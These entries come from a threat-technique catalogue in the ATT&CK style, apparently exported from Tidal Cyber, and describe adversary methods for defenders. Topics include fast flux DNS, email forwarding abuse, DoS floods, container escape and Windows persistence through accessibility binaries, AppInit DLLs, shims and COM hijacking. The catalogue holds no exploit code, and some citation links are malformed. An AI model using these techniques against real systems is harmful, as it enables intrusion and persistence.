Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.<sup>[[MehtaFastFluxPt1](https://app.tidalcyber.com/references/5f169cae-6b59-4879-9a8f-93fdcea5cc58)]</sup><sup>[[MehtaFastFluxPt2](https://app.tidalcyber.com/references/f8a98e55-c91e-4b5e-b6f3-0065ef07375d)]</sup><sup>[[Fast Flux - Welivesecurity](https://app.tidalcyber.com/references/e232d739-663e-4878-b13b-9248cd81e657)]</sup>

The simplest, "single-flux" method, involves registering and de-registering an addresses as part of the DNS A (address) record list for a single DNS name. These registrations have a five-minute average lifespan, resulting in a constant shuffle of IP address resolution.<sup>[[Fast Flux - Welivesecurity](https://app.tidalcyber.com/references/e232d739-663e-4878-b13b-9248cd81e657)]</sup>

In contrast, the "double-flux" method registers and de-registers an address as part of the DNS Name Server record list for the DNS zone, providing additional resilience for the connection. With double-flux additional hosts can act as a proxy to the C2 host, further insulating the true source of the C2 channel.

The tag is: misp-galaxy:technique="Fast Flux DNS"

Dynamic Resolution

Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware’s communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.

Adversaries may use dynamic resolution for the purpose of [Fallback Channels](https://app.tidalcyber.com/technique/be8786b3-cd3d-47ef-a9e7-cd3ab3c901a1). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.<sup>[[Talos CCleanup 2017](https://app.tidalcyber.com/references/f2522cf4-dc65-4dc5-87e3-9e88212fcfe9)]</sup><sup>[[FireEye POSHSPY April 2017](https://app.tidalcyber.com/references/b1271e05-80d7-4761-a13f-b6f0db7d7e5a)]</sup><sup>[[ESET Sednit 2017 Activity](https://app.tidalcyber.com/references/406e434e-0602-4a08-bbf6-6d72311a720e)]</sup>

The tag is: misp-galaxy:technique="Dynamic Resolution"

Email Forwarding Rule

Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.<sup>[[US-CERT TA18-068A 2018](https://app.tidalcyber.com/references/d9992f57-8ff3-432f-b445-937ff4a6ebf9)]</sup> Furthermore, email forwarding rules can allow adversaries to maintain persistent access to victim’s emails even after compromised credentials are reset by administrators.<sup>[[Pfammatter - Hidden Inbox Rules](https://app.tidalcyber.com/references/8a00b664-5a75-4365-9069-a32e0ed20a80)]</sup> Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or by command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.<sup>[[Microsoft Tim McMichael Exchange Mail Forwarding 2](https://app.tidalcyber.com/references/b5bf8e12-0133-46ea-85e3-b48c9901b518)]</sup><sup>[[Mac Forwarding Rules](https://app.tidalcyber.com/references/0ff40575-cd2d-4a70-a07b-fff85f520062)]</sup>

Any user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more. Adversaries may also hide the rule by making use of the Microsoft Messaging API (MAPI) to modify the rule properties, making it hidden and not visible from Outlook, OWA or most Exchange Administration tools.<sup>[[Pfammatter - Hidden Inbox Rules](https://app.tidalcyber.com/references/8a00b664-5a75-4365-9069-a32e0ed20a80)]</sup>

In some environments, administrators may be able to enable email forwarding rules that operate organization-wide rather than on individual inboxes. For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then performs a user-specified action on mail that adheres to those conditions.<sup>[[Microsoft Mail Flow Rules 2023](https://app.tidalcyber.com/references/421093d7-6ac8-5ebc-9a04-1c65bdce0980)]</sup> Adversaries that abuse such features may be able to enable forwarding on all or specific mail an organization receives.

The tag is: misp-galaxy:technique="Email Forwarding Rule"

Local Email Collection

Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.

Outlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.<sup>[[Outlook File Sizes](https://app.tidalcyber.com/references/6fbbb53f-cd4b-4ce1-942d-5cadb907cf86)]</sup> IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in C:\Users\<username>\Documents\Outlook Files or C:\Users\<username>\AppData\Local\Microsoft\Outlook.<sup>[[Microsoft Outlook Files](https://app.tidalcyber.com/references/29f4cc6b-1fa5-434d-ab4f-6bb169e2287a)]</sup>

The tag is: misp-galaxy:technique="Local Email Collection"

Remote Email Collection

Adversaries may target an Exchange server, Office 365, or Google Workspace to collect sensitive information. Adversaries may leverage a user’s credentials and interact directly with the Exchange server to acquire information from within a network. Adversaries may also access externally facing Exchange services, Office 365, or Google Workspace to access email using credentials or access tokens. Tools such as [MailSniper](https://app.tidalcyber.com/software/d762974a-ca7e-45ee-bc1d-f5218bf46c84) can be used to automate searches for specific keywords.

The tag is: misp-galaxy:technique="Remote Email Collection"

Email Collection

Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.

The tag is: misp-galaxy:technique="Email Collection"

Asymmetric Cryptography

Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal.

For efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://app.tidalcyber.com/technique/ce822cce-f7f1-4753-bff1-12e5bef66d53).

The tag is: misp-galaxy:technique="Asymmetric Cryptography"

Symmetric Cryptography

Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, DES, 3DES, Blowfish, and RC4.

The tag is: misp-galaxy:technique="Symmetric Cryptography"

Encrypted Channel

Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.

The tag is: misp-galaxy:technique="Encrypted Channel"

Application Exhaustion Flood

Adversaries may target resource intensive features of applications to cause a denial of service (DoS), denying availability to those applications. For example, specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself.<sup>[[Arbor AnnualDoSreport Jan 2018](https://app.tidalcyber.com/references/cede4c72-718b-48c2-8a59-1f91555f6cf6)]</sup>

The tag is: misp-galaxy:technique="Application Exhaustion Flood"

Application or System Exploitation

Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. <sup>[[Sucuri BIND9 August 2015](https://app.tidalcyber.com/references/5e108782-2f32-4704-be01-055d9e767216)]</sup> Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent denial of service (DoS) condition.

Adversaries may exploit known or zero-day vulnerabilities to crash applications and/or systems, which may also lead to dependent applications and/or systems to be in a DoS condition. Crashed or restarted applications or systems may also have other effects such as [Data Destruction](https://app.tidalcyber.com/technique/e5016c2b-85fe-4e6b-917d-0dd5b441cc34), [Firmware Corruption](https://app.tidalcyber.com/technique/559c647a-7759-4943-856d-dc717b5a443e), [Service Stop](https://app.tidalcyber.com/technique/e27c5756-f43e-424f-af62-b21e8b304e5d) etc. which may further cause a DoS condition and deny availability to critical information, applications and/or systems.

The tag is: misp-galaxy:technique="Application or System Exploitation"

OS Exhaustion Flood

Adversaries may launch a denial of service (DoS) attack targeting an endpoint’s operating system (OS). A system’s OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.

Different ways to achieve this exist, including TCP state-exhaustion attacks such as SYN floods and ACK floods.<sup>[[Arbor AnnualDoSreport Jan 2018](https://app.tidalcyber.com/references/cede4c72-718b-48c2-8a59-1f91555f6cf6)]</sup> With SYN floods, excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never completed. Because each OS has a maximum number of concurrent TCP connections that it will allow, this can quickly exhaust the ability of the system to receive new requests for TCP connections, thus preventing access to any TCP service provided by the server.<sup>[[Cloudflare SynFlood](https://app.tidalcyber.com/references/e292c4fe-ae77-4393-b666-fb6290cb4aa8)]</sup>

ACK floods leverage the stateful nature of the TCP protocol. A flood of ACK packets are sent to the target. This forces the OS to search its state table for a related TCP connection that has already been established. Because the ACK packets are for connections that do not exist, the OS will have to search the entire state table to confirm that no match exists. When it is necessary to do this for a large flood of packets, the computational requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to eliminate the rogue ACK packets. This greatly reduces the resources available for providing the targeted service.<sup>[[Corero SYN-ACKflood](https://app.tidalcyber.com/references/ec41de8a-c673-41bf-b713-4a647b135532)]</sup>

The tag is: misp-galaxy:technique="OS Exhaustion Flood"

Service Exhaustion Flood

Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.<sup>[[Arbor AnnualDoSreport Jan 2018](https://app.tidalcyber.com/references/cede4c72-718b-48c2-8a59-1f91555f6cf6)]</sup> Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.

One example of this type of attack is known as a simple HTTP flood, where an adversary sends a large number of HTTP requests to a web server to overwhelm it and/or an application that runs on top of it. This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service.<sup>[[Cloudflare HTTPflood](https://app.tidalcyber.com/references/1a5934a4-35ce-4f7c-be9c-c1faf4ee0838)]</sup>

Another variation, known as a SSL renegotiation attack, takes advantage of a protocol feature in SSL/TLS. The SSL/TLS protocol suite includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent secure connections. If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto algorithm. In a renegotiation attack, the adversary establishes a SSL/TLS connection and then proceeds to make a series of renegotiation requests. Because the cryptographic renegotiation has a meaningful cost in computation cycles, this can cause an impact to the availability of the service when done in volume.<sup>[[Arbor SSLDoS April 2012](https://app.tidalcyber.com/references/b5de4376-0deb-45de-83a0-09df98480464)]</sup>

The tag is: misp-galaxy:technique="Service Exhaustion Flood"

Endpoint Denial of Service

Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes<sup>[[FireEye OpPoisonedHandover February 2016](https://app.tidalcyber.com/references/1d57b1c8-930b-4bcb-a51e-39020327cc5d)]</sup> and to support other malicious activities, including distraction<sup>[[FSISAC FraudNetDoS September 2012](https://app.tidalcyber.com/references/9c8772eb-6d1d-4742-a2db-a5e1006effaa)]</sup>, hacktivism, and extortion.<sup>[[Symantec DDoS October 2014](https://app.tidalcyber.com/references/878e0382-4191-4bca-8adc-c379b0d57ba8)]</sup>

An Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).

To perform DoS attacks against endpoint resources, several aspects apply to multiple methods, including IP address spoofing and botnets.

Adversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.

Botnets are commonly used to conduct DDoS attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target’s resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.<sup>[[USNYAG IranianBotnet March 2016](https://app.tidalcyber.com/references/69ee73c1-359f-4584-a6e7-75119d24bbf5)]</sup>

In cases where traffic manipulation is used, there may be points in the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.<sup>[[ArsTechnica Great Firewall of China](https://app.tidalcyber.com/references/1a08d58f-bf91-4345-aa4e-2906d3ef365a)]</sup>

For attacks attempting to saturate the providing network, see [Network Denial of Service](https://app.tidalcyber.com/technique/e6c14a7b-1fb8-4557-83e7-7f5b89717311).

The tag is: misp-galaxy:technique="Endpoint Denial of Service"

Escape to Host

Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.<sup>[[Docker Overview](https://app.tidalcyber.com/references/52954bb1-16b0-4717-a72c-8a6dec97610b)]</sup>

There are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host; utilizing a privileged container to run commands or load a malicious kernel module on the underlying host; or abusing system calls such as unshare and keyctl to escalate privileges and steal secrets.<sup>[[Docker Bind Mounts](https://app.tidalcyber.com/references/b298b3d1-30c1-4894-b1de-be11812cde6b)]</sup><sup>[[Trend Micro Privileged Container](https://app.tidalcyber.com/references/92ac290c-4863-4774-b334-848ed72e3627)]</sup><sup>[[Intezer Doki July 20](https://app.tidalcyber.com/references/688b2582-6602-44e1-aaac-3a4b8e168b04)]</sup><sup>[[Container Escape](https://app.tidalcyber.com/references/8248917a-9afd-4ec6-a086-1a97a68deff1)]</sup><sup>[[Crowdstrike Kubernetes Container Escape](https://app.tidalcyber.com/references/84d5f015-9014-417c-b2a9-f650fe19d448)]</sup><sup>[[Keyctl-unmask](https://app.tidalcyber.com/references/75db8c88-e547-4d1b-8f22-6ace2b3d7ad4)]</sup>

Additionally, an adversary may be able to exploit a compromised container with a mounted container management socket, such as docker.sock, to break out of the container via a [Container Administration Command]([Container Escape(https://app.tidalcyber.com/references/8248917a-9afd-4ec6-a086-1a97a68deff1)]</sup> Adversaries may also escape via [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c), such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.<sup>[[Windows Server Containers Are Open](https://app.tidalcyber.com/references/9a801256-5852-433e-95bd-768f9b70b9fe)]</sup>

Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host.

The tag is: misp-galaxy:technique="Escape to Host"

Cloud Accounts

Adversaries may create accounts with cloud providers that can be used during targeting. Adversaries can use cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, MEGA, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://app.tidalcyber.com/technique/ce886c55-17ab-4c1c-90dc-3aa93e69bdb4) or to [Upload Tool](https://app.tidalcyber.com/technique/d7594eaf-286f-4484-94fa-8608c911767a)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://app.tidalcyber.com/technique/2c04d7c8-67a3-4b1a-bd71-47b7c5a54b23)s or [Serverless](https://app.tidalcyber.com/technique/c30faf84-496b-4f27-a4bc-aa36d583c69f) infrastructure. Establishing cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.<sup>[[Awake Security C2 Cloud](https://app.tidalcyber.com/references/fa3762ce-3e60-4991-b464-12601d2a6912)]</sup>

Creating [Cloud Accounts](https://app.tidalcyber.com/technique/4c7e52b1-9881-4966-b9b5-d88c5e88d604) may also require adversaries to establish [Email Accounts](https://app.tidalcyber.com/technique/1ff8b8f4-fa76-4226-a28b-b0c25c78b2eb) to register with the cloud provider.

The tag is: misp-galaxy:technique="Cloud Accounts"

Email Accounts

Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Phishing]([Mandiant APT1(https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]</sup> Adversaries may also take steps to cultivate a persona around the email account, such as through use of [Social Media Accounts](https://app.tidalcyber.com/technique/fe0bf22c-efb2-4bc6-96d8-e0e909502fd7), to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: [Domains]([Mandiant APT1(https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]</sup>

To decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services.<sup>[[Trend Micro R980 2016](https://app.tidalcyber.com/references/6afd89ba-2f51-4192-82b3-d961cc86adf1)]</sup>

The tag is: misp-galaxy:technique="Email Accounts"

Social Media Accounts

Adversaries may create and cultivate social media accounts that can be used during targeting. Adversaries can create social media accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations.<sup>[[NEWSCASTER2014](https://app.tidalcyber.com/references/9abb4bbb-bad3-4d22-b235-c8a35465f2ce)]</sup><sup>[[BlackHatRobinSage](https://app.tidalcyber.com/references/82068e93-a3f8-4d05-9358-6fe76a0055bb)]</sup>

For operations incorporating social engineering, the utilization of a persona on social media may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single social media site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Establishing a persona on social media may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.

Once a persona has been developed an adversary can use it to create connections to targets of interest. These connections may be direct or may include trying to connect through others.<sup>[[NEWSCASTER2014](https://app.tidalcyber.com/references/9abb4bbb-bad3-4d22-b235-c8a35465f2ce)]</sup><sup>[[BlackHatRobinSage](https://app.tidalcyber.com/references/82068e93-a3f8-4d05-9358-6fe76a0055bb)]</sup> These accounts may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://app.tidalcyber.com/technique/165ba336-3eab-4809-b6fd-d0dcc5478f7f)).

The tag is: misp-galaxy:technique="Social Media Accounts"

Establish Accounts

Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.<sup>[[NEWSCASTER2014](https://app.tidalcyber.com/references/9abb4bbb-bad3-4d22-b235-c8a35465f2ce)]</sup><sup>[[BlackHatRobinSage](https://app.tidalcyber.com/references/82068e93-a3f8-4d05-9358-6fe76a0055bb)]</sup>

For operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, GitHub, Docker Hub, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.<sup>[[NEWSCASTER2014](https://app.tidalcyber.com/references/9abb4bbb-bad3-4d22-b235-c8a35465f2ce)]</sup><sup>[[BlackHatRobinSage](https://app.tidalcyber.com/references/82068e93-a3f8-4d05-9358-6fe76a0055bb)]</sup>

Establishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Phishing]([Mandiant APT1(https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]</sup>

The tag is: misp-galaxy:technique="Establish Accounts"

Accessibility Features

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.

Two common accessibility programs are <code>C:\Windows\System32\sethc.exe</code>, launched when the shift key is pressed five times and <code>C:\Windows\System32\utilman.exe</code>, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen. <sup>[[FireEye Hikit Rootkit](https://app.tidalcyber.com/references/65d751cb-fdd2-4a45-81db-8a5a11bbee62)]</sup>

Depending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in <code>%systemdir%\</code>, and it must be protected by Windows File or Resource Protection (WFP/WRP). <sup>[[DEFCON2016 Sticky Keys](https://app.tidalcyber.com/references/f903146d-b63d-4771-8d53-28ef137c9349)]</sup> The [Image File Execution Options Injection](https://app.tidalcyber.com/technique/91d813d3-c17c-4c4c-b86e-0667f669a2f4) debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced.

For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., <code>C:\Windows\System32\utilman.exe</code>) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://app.tidalcyber.com/technique/f5fb86b6-abf0-4d44-b4a0-56f0636c24d2) will cause the replaced file to be executed with SYSTEM privileges. <sup>[[Tilbury 2014](https://app.tidalcyber.com/references/136325ee-0712-49dd-b3ab-a6f2bfb218b0)]</sup>

Other accessibility features exist that may also be leveraged in a similar fashion: <sup>[[DEFCON2016 Sticky Keys](https://app.tidalcyber.com/references/f903146d-b63d-4771-8d53-28ef137c9349)]</sup><sup>[[Narrator Accessibility Abuse](https://app.tidalcyber.com/references/fc889ba3-79a5-445a-81ea-dfe81c1cc542)]</sup>

  • On-Screen Keyboard: <code>C:\Windows\System32\osk.exe</code>

  • Magnifier: <code>C:\Windows\System32\Magnify.exe</code>

  • Narrator: <code>C:\Windows\System32\Narrator.exe</code>

  • Display Switcher: <code>C:\Windows\System32\DisplaySwitch.exe</code>

  • App Switcher: <code>C:\Windows\System32\AtBroker.exe</code>

The tag is: misp-galaxy:technique="Accessibility Features"

AppCert DLLs

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the <code>AppCertDLLs</code> Registry key under <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\</code> are loaded into every process that calls the ubiquitously used application programming interface (API) functions <code>CreateProcess</code>, <code>CreateProcessAsUser</code>, <code>CreateProcessWithLoginW</code>, <code>CreateProcessWithTokenW</code>, or <code>WinExec</code>. <sup>[[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)]</sup>

Similar to [Process Injection](https://app.tidalcyber.com/technique/7a6208ac-c75e-4e73-8969-0aaf6085cb6e), this value can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. Malicious AppCert DLLs may also provide persistence by continuously being triggered by API activity.

The tag is: misp-galaxy:technique="AppCert DLLs"

AppInit DLLs

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the <code>AppInit_DLLs</code> value in the Registry keys <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows</code> or <code>HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows</code> are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. <sup>[[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)]</sup>

Similar to Process Injection, these values can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. <sup>[[AppInit Registry](https://app.tidalcyber.com/references/dd3f98d9-0228-45a6-9e7b-1babf911a9ac)]</sup> Malicious AppInit DLLs may also provide persistence by continuously being triggered by API activity.

The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. <sup>[[AppInit Secure Boot](https://app.tidalcyber.com/references/2b951be3-5105-4665-972f-7809c057fd3f)]</sup>

The tag is: misp-galaxy:technique="AppInit DLLs"

Application Shimming

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. <sup>[[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)]</sup>

Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses hooking to redirect the code as necessary in order to communicate with the OS.

A list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:

  • <code>%WINDIR%\AppPatch\sysmain.sdb</code> and

  • <code>hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb</code>

Custom databases are stored in:

  • <code>%WINDIR%\AppPatch\custom & %WINDIR%\AppPatch\AppPatch64\Custom</code> and

  • <code>hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom</code>

To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Account Control](https://app.tidalcyber.com/technique/5e1499a1-f1ad-4929-84e1-5d33c371c02d) (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress).

Utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc. <sup>[[FireEye Application Shimming](https://app.tidalcyber.com/references/658c8dd6-1a6a-40f0-a7b5-286fd4b1985d)]</sup> Shims can also be abused to establish persistence by continuously being invoked by affected programs.

The tag is: misp-galaxy:technique="Application Shimming"

Change Default File Association

Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility.<sup>[[Microsoft Change Default Programs](https://app.tidalcyber.com/references/de515277-a280-40e5-ba34-3e8f16a5c703)]</sup><sup>[[Microsoft File Handlers](https://app.tidalcyber.com/references/cc12cd2c-4f41-4d7b-902d-53c35eb41210)]</sup><sup>[[Microsoft Assoc Oct 2017](https://app.tidalcyber.com/references/63fb65d7-6423-42de-b868-37fbc2bc133d)]</sup> Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.

System file associations are listed under <code>HKEY_CLASSES_ROOT\.[extension]</code>, for example <code>HKEY_CLASSES_ROOT\.txt</code>. The entries point to a handler for that extension located at <code>HKEY_CLASSES_ROOT\\[handler]</code>. The various commands are then listed as subkeys underneath the shell key at <code>HKEY_CLASSES_ROOT\\[handler]\shell\\[action]\command</code>. For example:

  • <code>HKEY_CLASSES_ROOT\txtfile\shell\open\command</code>

  • <code>HKEY_CLASSES_ROOT\txtfile\shell\print\command</code>

  • <code>HKEY_CLASSES_ROOT\txtfile\shell\printto\command</code>

The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands.<sup>[[TrendMicro TROJ-FAKEAV OCT 2012](https://app.tidalcyber.com/references/5d9e974f-07f8-48e4-96b6-632ecb31465d)]</sup>

The tag is: misp-galaxy:technique="Change Default File Association"

Component Object Model Hijacking

Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. COM is a system within Windows to enable interaction between software components through the operating system.<sup>[[Microsoft Component Object Model](https://app.tidalcyber.com/references/e1bb3872-7748-4e64-818f-6187a20d59f0)]</sup> References to various COM objects are stored in the Registry.

Adversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary’s code will be executed instead.<sup>[[GDATA COM Hijacking](https://app.tidalcyber.com/references/98e88505-b916-430d-aef6-616ba7ddd88e)]</sup> An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.

The tag is: misp-galaxy:technique="Component Object Model Hijacking"

Emond

